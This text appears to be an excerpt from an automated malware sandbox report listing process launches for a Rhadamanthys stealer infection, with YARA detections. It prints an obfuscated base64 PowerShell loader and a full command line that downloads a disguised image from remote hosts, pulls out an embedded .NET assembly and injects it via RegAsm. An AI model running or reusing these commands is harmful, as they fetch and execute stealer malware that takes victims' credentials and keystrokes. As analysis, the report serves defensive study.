Bk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@Jw@g@HQ@e@B0@C4@YwBo@EE@RgBB@G0@aw@v@HM@ZQBs@Gk@ZgBf@GM@aQBs@GI@dQBw@C8@N@@2@C4@Ng@y@DI@Lg@w@DY@Lg@y@DY@Lw@v@Do@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:09:49:06
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:09:49:08
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:09:49:16
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                          Imagebase:0xf00000
                                                                                          File size:65'440 bytes
                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:09:49:18
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                          Imagebase:0x280000
                                                                                          File size:676'584 bytes
                                                                                          MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:09:49:18
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 676
                                                                                          Imagebase:0x8b0000
                                                                                          File size:483'680 bytes
                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >